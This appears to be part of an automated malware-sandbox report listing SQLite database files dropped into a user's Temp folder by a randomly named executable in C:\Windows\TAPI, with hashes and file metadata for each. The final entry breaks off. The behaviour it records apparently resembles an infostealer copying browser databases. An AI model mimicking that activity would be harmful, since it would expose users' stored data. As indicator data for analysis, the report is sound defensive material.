                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3c8MSY2kPb

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4RgFusSa7h

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4knyNWBHg8

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4vPdLzPK7l

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4wPz7pNzuT

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4wa09dY8Kb

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\54t12C5XRW

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5Oyuj1dy4H

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5Xddsga6TJ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5wOMz47rCo

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5yKqrQezhM

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\63YPWZatTm

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\6eVhxpBIan

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\6xsDCHx81L

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7DZ9klYdAj

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7KL2JobGTj

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7c9dUlTBkA

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7cvZb53yH8

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7jMy2KfSB8

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8UHUW7G6S9

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8Vq6jjmbjQ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
